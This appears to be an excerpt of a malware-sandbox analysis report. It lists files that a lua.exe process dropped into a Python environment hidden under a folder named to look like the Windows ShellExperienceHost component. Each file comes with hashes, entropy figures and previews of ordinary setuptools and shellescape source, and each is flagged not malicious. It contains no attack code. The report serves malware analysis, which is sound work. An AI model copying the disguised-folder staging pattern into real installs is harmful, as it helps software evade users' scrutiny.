Preview:	""".Filename globbing utility. Mostly a copy of `glob` from Python 3.5...Changes include:. * `yield from` and PEP3102 `` removed.. Hidden files are not ignored.."""..import os.import re.import fnmatch..__all__ = ["glob", "iglob", "escape"]...def glob(pathname, recursive=False):. """Return a list of paths matching a pathname pattern... The pattern may contain simple shell-style wildcards a la. fnmatch. However, unlike fnmatch, filenames starting with a. dot are special cases that are not matched by '' and '?'. patterns... If recursive is true, the pattern '*' will match any files and. zero or more directories and subdirectories.. """. return list(iglob(pathname, recursive=recursive))...def iglob(pathname, recursive=False):. """Return an iterator which yields the paths matching a pathname pattern... The pattern may contain simple shell-style wildcards a la. fnmatch. However, unlike fnmatch, filenames starting with a. dot are special cases that

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui-32.exe Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	6.390958988358771
Encrypted:	false
SSDEEP:	768:nMgEYaPKRsVvd7M826QXqVXDjPXHyRhQcBU+zGqJS967GMctEvdGA9SYxQ:Mg/6/tM8NXDjPX0QWlfGMckTQ
MD5:	E97C622B03FB2A2598BF019FBBE29F2C
SHA1:	32698BD1D3A0FF6CF441770D1B2B816285068D19
SHA-256:	5C1AF46C7300E87A73DACF6CF41CE397E3F05DF6BD9C7E227B4AC59F85769160
SHA-512:	DB70C62FB35A8E5B005F13B57C1EBBF6C465F6FF0524422294C43E27FB4AA79379DC1E300AD11DC2354405C43B192AE06B91C0F525A1F2617E4D14673651A87D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S..2...2...2......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q.....................N.......&............@..........................@..............................................4...(.......................................................................@...............@............................text............................... ..`.rdata..h ......."..................@..@.data....+..........................@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui-64.exe Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	75264
Entropy (8bit):	6.114619708611424
Encrypted:	false
SSDEEP:	1536:MpsuhGpr4+qQt4O/6LEmo1dFPo6O28E0PTBmf2iBQsdkRQ5WF:MpsgozqC4O/jHxo6l0PTBuJBQbRQ5WF
MD5:	2FFC9A24492C0A1AF4D562F0C7608AA5
SHA1:	1FD5FF6136FBA36E9EE22598ECD250AF3180EE53
SHA-256:	69828C857D4824B9F850B1E0597D2C134C91114B7A0774C41DFFE33B0EB23721
SHA-512:	03806D162931B1DCF036A51E753FF073A43664491A3CD2E649E55DD77D5E910F7BCF1E217EB0889EF606457B679428640E975EE227DE941A200F652417BC6D5D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#^..g?..g?..g?..@...d?..g?..:?...p\.c?..ymN.C?..ym_.m?..ymI..?..ym[.f?..Richg?..........PE..d......Q..........#..........l.......+.........@.............................p..................................................................(............`.......................................................................................................text............................... ..`.rdata...).......*..................@..@.data....5... ......................@....pdata.......`......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui.exe Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	6.390958988358771
Encrypted:	false
SSDEEP:	768:nMgEYaPKRsVvd7M826QXqVXDjPXHyRhQcBU+zGqJS967GMctEvdGA9SYxQ:Mg/6/tM8NXDjPX0QWlfGMckTQ
MD5:	E97C622B03FB2A2598BF019FBBE29F2C
SHA1:	32698BD1D3A0FF6CF441770D1B2B816285068D19
SHA-256:	5C1AF46C7300E87A73DACF6CF41CE397E3F05DF6BD9C7E227B4AC59F85769160
SHA-512:	DB70C62FB35A8E5B005F13B57C1EBBF6C465F6FF0524422294C43E27FB4AA79379DC1E300AD11DC2354405C43B192AE06B91C0F525A1F2617E4D14673651A87D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S..2...2...2......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q.....................N.......&............@..........................@..............................................4...(.......................................................................@...............@............................text............................... ..`.rdata..h ......."..................@..@.data....+..........................@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\installer.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5277
Entropy (8bit):	4.616537559943389
Encrypted:	false
SSDEEP:	96:etbZGAWjsWl6EHjpUjRMGntlbTrhlL/q8:eJZ9WjsWlNd2RxT/q8
MD5:	276DCDB52880CA0625B9447EA2E5DB26
SHA1:	ABD4CEB71BD9F5CB10BD40C9ED639823FBF77C93
SHA-256:	1BAC411ED73719847A7D728B37AC509787F9D0A21A00CC8CA4CB249CE2C746DD
SHA-512:	7D78669E5774C63943C02C6E6ACD7DE944C5D4B78B99729851AA38C72C98F279BD4C559925223AF3A0EC9BC78AB521D5BE7E18CE3D8560CCC86320ED5A00D15E
Malicious:	false
Preview:	import glob.import os.import subprocess.import sys.import tempfile.from distutils import log.from distutils.errors import DistutilsError..import pkg_resources.from setuptools.command.easy_install import easy_install.from setuptools.wheel import Wheel...def _fixup_find_links(find_links):. """Ensure find-links option end-up being a list of strings.""". if isinstance(find_links, str):. return find_links.split(). assert isinstance(find_links, (tuple, list)). return find_links...def _legacy_fetch_build_egg(dist, req):. """Fetch an egg needed for building... Legacy path using EasyInstall.. """. tmp_dist = dist.__class__({'script_args': ['easy_install']}). opts = tmp_dist.get_option_dict('easy_install'). opts.clear(). opts.update(. (k, v). for k, v in dist.get_option_dict('easy_install').items(). if k in (. # don't use any other settings. 'find_links', 'site_dirs', 'index_url',. 'optimize', 'site_dir

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\launch.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	812
Entropy (8bit):	4.595220091235467
Encrypted:	false
SSDEEP:	24:9xGOtulWpW5g3RehYIClwH03J6sqYC5P4Cuhmrdenaoakc:9xG+ukpW5g3s2IC+H0I2TUkakc
MD5:	D17656790B6232741D052C636CC0FE24
SHA1:	782306700E0C400CFC574D3837E669B90B69D78E
SHA-256:	4F23D3F887354F612762F18EDBA81F3513F8CAC065AE1A5B4634315AC88EE35E
SHA-512:	7B6357AFF09B9A76C05090936FFA0D344BEDEEF7F1A59B885BFB60B790FFFE9B48A4EE9B248A753D5222B814C404BEEEC32313639B3E254915DF38BA8CBB7475
Malicious:	false
Preview:	""".Launch the Python script on the command line after.setuptools is bootstrapped via import.."""..# Note that setuptools gets imported implicitly by the.# invocation of this script using python -m setuptools.launch..import tokenize.import sys...def run():. """. Run the script in sys.argv[1] as if it had. been invoked naturally.. """. __builtins__. script_name = sys.argv[1]. namespace = dict(. __file__=script_name,. __name__='__main__',. __doc__=None,. ). sys.argv[:] = sys.argv[1:].. open_ = getattr(tokenize, 'open', open). with open_(script_name) as fid:. script = fid.read(). norm_script = script.replace('\\r\\n', '\\n'). code = compile(norm_script, script_name, 'exec'). exec(code, namespace)...if __name__ == '__main__':. run().

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\lib2to3_ex.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2335
Entropy (8bit):	4.443090163843431
Encrypted:	false
SSDEEP:	48:elS6QtywSQAsjauMn2oXk17Rn2h8gpLuF:elSnySauyZOMh8CA
MD5:	59F111DD6CA6452ADCF5C9DFBA68DD9D
SHA1:	D1AA75016D12342A1BFCAEFBBD4F91AF27C41AE5
SHA-256:	60A03B0A6748256C32D3ECAE640C548283476D71664F8A79DE235A7567414029
SHA-512:	59774336D1647DBB90A6D4CD317A0D21A1CE0504E8B3133993530995E11DB970D670400FE8361CE3115067D4E62F825EC590DFFD2D27FE813C2C46B4A39A0612
Malicious:	false
Preview:	""".Customized Mixin2to3 support:.. - adds support for converting doctests."""..import warnings.from distutils.util import Mixin2to3 as _Mixin2to3.from distutils import log.from lib2to3.refactor import RefactoringTool, get_fixers_from_package..import setuptools.from ._deprecation_warning import SetuptoolsDeprecationWarning...class DistutilsRefactoringTool(RefactoringTool):. def log_error(self, msg, args, kw):. log.error(msg, args).. def log_message(self, msg, args):. log.info(msg, args).. def log_debug(self, msg, args):. log.debug(msg, args)...class Mixin2to3(_Mixin2to3):. def run_2to3(self, files, doctests=False):. # See of the distribution option has been set, otherwise check the. # setuptools default.. if self.distribution.use_2to3 is not True:. return. if not files:. return.. warnings.warn(. "2to3 support is deprecated. If the project still ". "requires Python 2 s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\monkey.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5217
Entropy (8bit):	4.670512237171199
Encrypted:	false
SSDEEP:	96:5HjvY4oexlYvlscQFGKOeUeRZqzwy80DIKKRTQZ9vOAIudV14:VU4oe0vlscQFG6Uji
MD5:	219798906C8BBE98A7DEBD58377E558E
SHA1:	63551B145E376AC3E89DC7B0D39E7474B14FD055
SHA-256:	D1EDC77552971CBE35E4EEE7A7E014AA11055CF3EE0DD24A6C8E3B72143F0C4E
SHA-512:	E561FF14CE621D240D0CB2322BDD756A18A3D6784DADE25D621AB3CD20C170E3E43A3B9B9BF78531C8D5517B4153D4E65FBB106C0800E1B0976EB6073346D82F
Malicious:	false
Preview:	""".Monkey patching of distutils.."""..import sys.import distutils.filelist.import platform.import types.import functools.from importlib import import_module.import inspect..import setuptools..__all__ = [].""".Everything is private. Contact the project team.if you think you need this functionality.."""...def _get_mro(cls):. """. Returns the bases classes for cls sorted by the MRO... Works around an issue on Jython where inspect.getmro will not return all. base classes if multiple classes share the same name. Instead, this. function will return a tuple containing the class itself, and the contents. of cls.__bases__. See https://github.com/pypa/setuptools/issues/1024.. """. if platform.python_implementation() == "Jython":. return (cls,) + cls.__bases__. return inspect.getmro(cls)...def get_unpatched(item):. lookup = (. get_unpatched_class if isinstance(item, type) else. get_unpatched_function if isinstance(item, types.FunctionType) else.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\msvc.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	51197
Entropy (8bit):	4.4264752153602585
Encrypted:	false
SSDEEP:	768:FRqZmbB+7Enh2/Dex5GC5RanIp4C3qC28v4xOV3IDFb:Fw5y+Dex9RanIp4C3qDXFb
MD5:	9FB7C55769C417048AD09B534CDE60D0
SHA1:	8AEF996D4A8F0A08E54CC238C27B8BE0522F5AB4
SHA-256:	3C7B235A74F0683D768032759DBB7D5A4711BF038E7D32B437BC397E64D94D2D
SHA-512:	620C1BB72F7644316A4CF924AB25DBA2D95DCE6A02F8DD0888C25C32699A71BD468308B017DEF6F9DF9F7B7980C8AF86A566F0F6C10DE0D5EA51A46E98322DAD
Malicious:	false
Preview:	""".Improved support for Microsoft Visual C++ compilers...Known supported compilers:.--------------------------.Microsoft Visual C++ 9.0:. Microsoft Visual C++ Compiler for Python 2.7 (x86, amd64). Microsoft Windows SDK 6.1 (x86, x64, ia64). Microsoft Windows SDK 7.0 (x86, x64, ia64)..Microsoft Visual C++ 10.0:. Microsoft Windows SDK 7.1 (x86, x64, ia64)..Microsoft Visual C++ 14.X:. Microsoft Visual C++ Build Tools 2015 (x86, x64, arm). Microsoft Visual Studio Build Tools 2017 (x86, x64, arm, arm64). Microsoft Visual Studio Build Tools 2019 (x86, x64, arm, arm64)..This may also support compilers shipped with compatible Visual Studio versions.."""..import json.from io import open.from os import listdir, pathsep.from os.path import join, isfile, isdir, dirname.import sys.import platform.import itertools.import subprocess.import distutils.errors.from setuptools.extern.packaging.version import LegacyVersion..from .monkey import get_unpatched..if platform.system() == 'W

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\namespaces.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3093
Entropy (8bit):	4.3923260091811756
Encrypted:	false
SSDEEP:	96:2uzEKnQZH7XRuOIOLYRaHGo8JLQ3jdmbyncBQ5:8DcOIOlmbLQJmbHBQ5
MD5:	C6AA890D2E554A56082CE3D7FB65E7C1
SHA1:	1E476E210066950D20E85B2282342EE6EEB394F1
SHA-256:	3CCA8654F5CF610823513BC483D6C671C440908383AD0E8D9AC0E0FDFC04AF02
SHA-512:	81C9D4BA343223E1FDBFC069CDAC72C96F53502D26A0E6413E19FBFE0CCBF44B5288BA976249905DCB8E418CA9B9918DF7A39A8175B8B82D96C963DE1A8C2012
Malicious:	false
Preview:	import os.from distutils import log.import itertools...flatten = itertools.chain.from_iterable...class Installer:.. nspkg_ext = '-nspkg.pth'.. def install_namespaces(self):. nsp = self._get_all_ns_packages(). if not nsp:. return. filename, ext = os.path.splitext(self._get_target()). filename += self.nspkg_ext. self.outputs.append(filename). log.info("Installing %s", filename). lines = map(self._gen_nspkg_line, nsp).. if self.dry_run:. # always generate the lines, even in dry run. list(lines). return.. with open(filename, 'wt') as f:. f.writelines(lines).. def uninstall_namespaces(self):. filename, ext = os.path.splitext(self._get_target()). filename += self.nspkg_ext. if not os.path.exists(filename):. return. log.info("Removing %s", filename). os.remove(filename).. def _get_target(self):. return self.targe

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\package_index.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	40610
Entropy (8bit):	4.47352796485333
Encrypted:	false
SSDEEP:	384:gFWDEKqcgkrdSucK5ajsVA+bE79e8EMB+NopnyJ57NFF277oFRajO8gg98tT13O:gUhZMucKojMG7mNcnyb7BYY4L98tlO
MD5:	0834C1ECC0613116F94FF1E4D8C11731
SHA1:	9536EEEB425ECAA05D7DE3FF7973E5F59FCD4E39
SHA-256:	9512E369F60D991277FD93E6830754FC4BE1D813AEEB73C9A093D96EC5CF22B4
SHA-512:	6546C8378E59409E8F91A133A1E05ACCC17B979F8E265586298F1CA77F9737724A091FED64B2694A5E42D4EF53C3335844D1E41BB11315D618FE45EB80146D87
Malicious:	false
Preview:	"""PyPI and direct package downloading""".import sys.import os.import re.import io.import shutil.import socket.import base64.import hashlib.import itertools.import warnings.import configparser.import html.import http.client.import urllib.parse.import urllib.request.import urllib.error.from functools import wraps..import setuptools.from pkg_resources import (. CHECKOUT_DIST, Distribution, BINARY_DIST, normalize_path, SOURCE_DIST,. Environment, find_distributions, safe_name, safe_version,. to_filename, Requirement, DEVELOP_DIST, EGG_DIST,.).from setuptools import ssl_support.from distutils import log.from distutils.errors import DistutilsError.from fnmatch import translate.from setuptools.wheel import Wheel..EGG_FRAGMENT = re.compile(r'^egg=([-A-Za-z0-9_.+!]+)$').HREF = re.compile(r"""href\s=\s['"]?([^'"> ]+)""", re.I).PYPI_MD5 = re.compile(. r'<a href="([^"#]+)">([^<]+)</a>\n\s+\(<a (?:title="MD5 hash"\n\s+)'. r'href="[^?]+\?:action=show_md5&digest=([0-9a-f]{32})">m

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\py34compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	245
Entropy (8bit):	4.357135567119317
Encrypted:	false
SSDEEP:	6:L4oQ6JpLXwMJM4tD9H/D9usHg06D9/w9ft3ipv:L4x6JRwe9tDp/DMsgfD9w9ftAv
MD5:	CC3DFAA6AFE52E91A896A5F214A623C8
SHA1:	4FE2E414ADD89A8140913B50D59E93D8D667E89D
SHA-256:	29839DEB26D1C63056F0D266603F2DFD4CB2566CACA69157A87A452DDB251975
SHA-512:	9B438D051D83E26DC8E2EB33CDDCCB95F1CD11124692B5CC8AC3B9BA2185D8AC5F481855A34513518F901B68C217799F4BB6EE8E368F94761AB17FCA42FC69ED
Malicious:	false
Preview:	import importlib..try:. import importlib.util.except ImportError:. pass...try:. module_from_spec = importlib.util.module_from_spec.except AttributeError:. def module_from_spec(spec):. return spec.loader.load_module(spec.name).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\sandbox.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14151
Entropy (8bit):	4.550045959000402
Encrypted:	false
SSDEEP:	192:ZpkMBcEMaagIIqAMlPWTggHRfZHMHwkU0bu1HgHSCyPfBgIjy5LG4D:ZptagbqAtxPfBfjy5f
MD5:	414CC18D7B38F53884EE1BB38E96B30C
SHA1:	D46548788FBAF151EEE95EDA14F804E2B347BA82
SHA-256:	222AF199E0876E5D421D3EE910F810EAD4F1F7053CE789FE776A7CD12BBCB797
SHA-512:	14EF357BFFD38238852FAFA25F171662D92228F59C036FDEDBEAB7A2A6F0107294B73AFDED3B1D5461BF1D6717E8818B38ADCD9E9F42A975D79042CF3E28455E
Malicious:	false
Preview:	import os.import sys.import tempfile.import operator.import functools.import itertools.import re.import contextlib.import pickle.import textwrap.import builtins..import pkg_resources.from distutils.errors import DistutilsError.from pkg_resources import working_set..if sys.platform.startswith('java'):. import org.python.modules.posix.PosixModule as _os.else:. _os = sys.modules[os.name].try:. _file = file.except NameError:. _file = None._open = open...__all__ = [. "AbstractSandbox", "DirectorySandbox", "SandboxViolation", "run_setup",.]...def _execfile(filename, globals, locals=None):. """. Python 3 implementation of execfile.. """. mode = 'rb'. with open(filename, mode) as stream:. script = stream.read(). if locals is None:. locals = globals. code = compile(script, filename, 'exec'). exec(code, globals, locals)...@contextlib.contextmanager.def save_argv(repl=None):. saved = sys.argv[:]. if repl is not None:. sys.argv[:] =

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\script (dev).tmpl Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	218
Entropy (8bit):	4.933979931150322
Encrypted:	false
SSDEEP:	6:SWtKjcyXrvEXFov66Ji+DqMedPKejpCYI+dLC9:nKZJvVEPLlClOLC9
MD5:	762D226E24C456568A2F4305151094BE
SHA1:	982302A6A5664F02C8CC87407DC7F2F5B5FBD825
SHA-256:	454CD0CC2414697B7074BB581D661B21098E6844B906BAAAD45BD403FB6EFB92
SHA-512:	AB81BAF791AAFBA3391DFC0EBD32A87EC4820E044BC5CF53FAD7D27DABFA87D4979F76164EF017B3F5FD3DAEE544BF724B67D01E0EF8B72B6FA3223E5F23DD48
Malicious:	false
Preview:	# EASY-INSTALL-DEV-SCRIPT: %(spec)r,%(script_name)r.__requires__ = %(spec)r.__import__('pkg_resources').require(%(spec)r).__file__ = %(dev_path)r.with open(__file__) as f:. exec(compile(f.read(), __file__, 'exec')).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\script.tmpl Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	138
Entropy (8bit):	4.782879665178461
Encrypted:	false
SSDEEP:	3:SWsiKQ3shBMZoWGXrWWbpW6iFoqM/66JiWOQfDBWVSEqbZhGbWWun:SWtKQXyXrvEXFov66Ji+DgVSEqlhGban
MD5:	C7C13D61B7887915BFC911031126AF09
SHA1:	FA9B9F2E89357C8597490720B623D3B875136773
SHA-256:	5864EDE6989ECCEDBB73E0DBC7A9794384F715FDB4039CFBF3BDA1BF76808586
SHA-512:	1E115F1555DA61D2EF330FDE94010A0138C4D761342EA02B109B21F11F2E4EE59243B4137CB72FAFDF2347A4C56CE453E239E838E446EFD01A69706D25B6FBA0
Malicious:	false
Preview:	# EASY-INSTALL-SCRIPT: %(spec)r,%(script_name)r.__requires__ = %(spec)r.__import__('pkg_resources').run_script(%(spec)r, %(script_name)r).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\ssl_support.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8511
Entropy (8bit):	4.555026044431464
Encrypted:	false
SSDEEP:	192:QN/fVyjFNRUAmwQVuGJguywry4CAoiSVJgP4goRTSMPB:QN3AjFNyzmXAoiSduMPB
MD5:	FC360AEBFF832E3FEE937022EF4EBBDF
SHA1:	285A75FCE1EA5ABF9F4B4934F850B15EDB937F00
SHA-256:	DF2BB19982713EEA4BF7B7784418A1328D5408C5D2A2ED54A67E1513D8E4AB8F
SHA-512:	310CC5BF70EDBC7BAD2ED5EEC3DD25836C91E085650AE8EC7DC9A72AE3DC698470A08525B7C010800873B95D19B90528FB7CA78B01C39ADE2499CEC95734B88C
Malicious:	false
Preview:	import os.import socket.import atexit.import re.import functools.import urllib.request.import http.client...from pkg_resources import ResolutionError, ExtractionError..try:. import ssl.except ImportError:. ssl = None..__all__ = [. 'VerifyingHTTPSHandler', 'find_ca_bundle', 'is_available', 'cert_paths',. 'opener_for'.]..cert_paths = """./etc/pki/tls/certs/ca-bundle.crt./etc/ssl/certs/ca-certificates.crt./usr/share/ssl/certs/ca-bundle.crt./usr/local/share/certs/ca-root.crt./etc/ssl/cert.pem./System/Library/OpenSSL/certs/cert.pem./usr/local/share/certs/ca-root-nss.crt./etc/ssl/ca-bundle.pem.""".strip().split()..try:. HTTPSHandler = urllib.request.HTTPSHandler. HTTPSConnection = http.client.HTTPSConnection.except AttributeError:. HTTPSHandler = HTTPSConnection = object..is_available = ssl is not None and object not in (. HTTPSHandler, HTTPSConnection)...try:. from ssl import CertificateError, match_hostname.except ImportError:. try:. from backports.ssl_

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\unicode_utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	941
Entropy (8bit):	4.404160600197225
Encrypted:	false
SSDEEP:	24:hIDP3g1Z5Ton5TdDdu/m9ITxk1Q+ImVYVwMmeKmtFTbmB0TlXZ:qrw1jWBdu/m9Kxk1QgaOreRtRboolZ
MD5:	01778F86BAEC59BCADF8BD6A3BBBBD84
SHA1:	DB0C1C9900F14ACAD89DB32481E30A4BD4A38C69
SHA-256:	68E385A38246C00B2206DB46603B2A152ED8A9641E6768FA0D6882B9CB51FF4D
SHA-512:	1E679BD932CBA232D63D20BA48C833772C580E6841E01852534EB96E099956B9B45E0D265D233EEF155499DC4E394F3177BB9FF825F565DB8AEE11FF60D8BC67
Malicious:	false
Preview:	import unicodedata.import sys...# HFS Plus uses decomposed UTF-8.def decompose(path):. if isinstance(path, str):. return unicodedata.normalize('NFD', path). try:. path = path.decode('utf-8'). path = unicodedata.normalize('NFD', path). path = path.encode('utf-8'). except UnicodeError:. pass # Not UTF-8. return path...def filesys_decode(path):. """. Ensure that the given path is decoded,. NONE when no expected encoding works. """.. if isinstance(path, str):. return path.. fs_enc = sys.getfilesystemencoding() or 'utf-8'. candidates = fs_enc, 'utf-8'.. for enc in candidates:. try:. return path.decode(enc). except UnicodeDecodeError:. continue...def try_encode(string, enc):. "turn unicode encoding into a functional routine". try:. return string.encode(enc). except UnicodeEncodeError:. return None.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\version.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.417898929027104
Encrypted:	false
SSDEEP:	3:JSgCtzUvq6qvDNqMWKwNzYCMyWn4GMgdFNfH/66qvALKSLCv:QzUSVDuDMxwMNHyVA5Cv
MD5:	E862A919EE80E66C10CC490DCC04D2DA
SHA1:	C48D73BB3510C68A51B30E14860E522F0E4E35D9
SHA-256:	A20FDCB9941BD1023ABA429915F6563E5AF51E02413CF9F6BCEDA6FDB23D6531
SHA-512:	2978EE0B5A23957D0A6872E225296F5B42FFE2D15A4CCBDCAD05A2ECF999A6CDE621F8E1A26D446B12DB001D8FFFBC0E32BADDD55EF563284FB9E8C40ADC82B1
Malicious:	false
Preview:	import pkg_resources..try:. __version__ = pkg_resources.get_distribution('setuptools').version.except Exception:. __version__ = 'unknown'.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\wheel.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8288
Entropy (8bit):	4.437898799086932
Encrypted:	false
SSDEEP:	192:vTfiKbxpoj6q3qVfyadQUhefet8bVPvH0:rfimLsqlgfet8bVPM
MD5:	51889F16E3C63E530C6D149B29BCC984
SHA1:	1864EEFFB42A5C3C07E818E49EEEDED3402B6CFB
SHA-256:	D0FF2D4A4D74E6E17F51BFB7D0DD875365F6BFB30A0D2763A5E4254515B74A42
SHA-512:	A6BF70BB7ABB32E64E8A2B4C986EAB3978700952288730F8EFC4FCA47036365B6BB6568598E6672771905AF8C660680DAF953C93E595EC0B8555C623514DCD52
Malicious:	false
Preview:	"""Wheels support."""..from distutils.util import get_platform.from distutils import log.import email.import itertools.import os.import posixpath.import re.import zipfile..import pkg_resources.import setuptools.from pkg_resources import parse_version.from setuptools.extern.packaging.tags import sys_tags.from setuptools.extern.packaging.utils import canonicalize_name.from setuptools.command.egg_info import write_requirements...WHEEL_NAME = re.compile(. r"""^(?P<project_name>.+?)-(?P<version>\d.?). ((-(?P<build>\d.?))?-(?P<py_version>.+?)-(?P<abi>.+?)-(?P<platform>.+?). )\.whl$""",. re.VERBOSE).match..NAMESPACE_PACKAGE_INIT = \. "__import__('pkg_resources').declare_namespace(__name__)\n"...def unpack(src_dir, dst_dir):. '''Move everything under `src_dir` to `dst_dir`, and delete the former.'''. for dirpath, dirnames, filenames in os.walk(src_dir):. subdir = os.path.relpath(dirpath, src_dir). for f in filenames:. src = os.path.join(dirpath,

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\windows_support.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	714
Entropy (8bit):	5.02310008177412
Encrypted:	false
SSDEEP:	12:d8UzCEgFfIWTiPnvZWrMKlDeMzbgaMKzkMKviMKMp/0tb/CQdFMg:jGN2WEvZyNlSihN4NviNMp/0tb/CQfh
MD5:	40BE0A33CC341934C40550D345CCDE28
SHA1:	340F8131F230DE0C5584DABE2745F2745337AE50
SHA-256:	E46ADFA923F6F9D2C6268653AB683A7422A4C90C716B69F92108979490A86041
SHA-512:	1511778CAD1852C6E35998FD064F91D58AA0C5B2E8427FD38D4B003A3CC073057C94C74A3C728F3E97D3B1A9F53FEA4DFF8D5965E208A462E2A4267EB1A2E593
Malicious:	false
Preview:	import platform.import ctypes...def windows_only(func):. if platform.system() != 'Windows':. return lambda args, *kwargs: None. return func...@windows_only.def hide_file(path):. """. Set the hidden attribute on a file or directory... From http://stackoverflow.com/questions/19622133/.. `path` must be text.. """. __import__('ctypes.wintypes'). SetFileAttributes = ctypes.windll.kernel32.SetFileAttributesW. SetFileAttributes.argtypes = ctypes.wintypes.LPWSTR, ctypes.wintypes.DWORD. SetFileAttributes.restype = ctypes.wintypes.BOOL.. FILE_ATTRIBUTE_HIDDEN = 0x02.. ret = SetFileAttributes(path, FILE_ATTRIBUTE_HIDDEN). if not ret:. raise ctypes.WinError().

C:\ProgramData\ShellExperienceHost\Lib\site-packages\shellescape-3.8.1.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\shellescape-3.8.1.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2830
Entropy (8bit):	5.048867276892048
Encrypted:	false
SSDEEP:	48:Duh8Bkqf+dYjjQIUQIhQI4QIRjfuIuFyP97Xs9UTxtvxeZJkjI6izLxT8vmdnxdU:DuaBk7YjjQIUQIhQI4QIRHuFyP9789WD
MD5:	5AECEC973E6B24F5528EDEE69E3FA362
SHA1:	8256E60B51F3D03BDD9A58C705B4674612DDEDD6
SHA-256:	D09282B6C51A70614170F1664051176617FAB3A60BD47B6F263519C30B07C16D
SHA-512:	C13F53AD7717D8A423E9957D9F347B06A35A512D870B700E5AE331440FF6EC22866D69939F24A0A3260203A06F8B31DD775541AD2E0246C3641476644B6CF2C4
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: shellescape.Version: 3.8.1.Summary: Shell escape a string to safely use it as a token in a shell command (backport of cPython shlex.quote for Python versions 2.x & < 3.3).Home-page: https://github.com/chrissimpkins/shellescape.Author: Christopher Simpkins.Author-email: git.simpkins@gmail.com.License: MIT license.Keywords: shell,quote,escape,backport,command line,command,subprocess.Platform: any.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Natural Language :: English.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 3.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: Unix.Classifier: Operating System :: Microsoft :: Windows.Description-Content-Type: text/markdown..# shellescape..## Descript

C:\ProgramData\ShellExperienceHost\Lib\site-packages\shellescape-3.8.1.dist-info\RECORD Download File
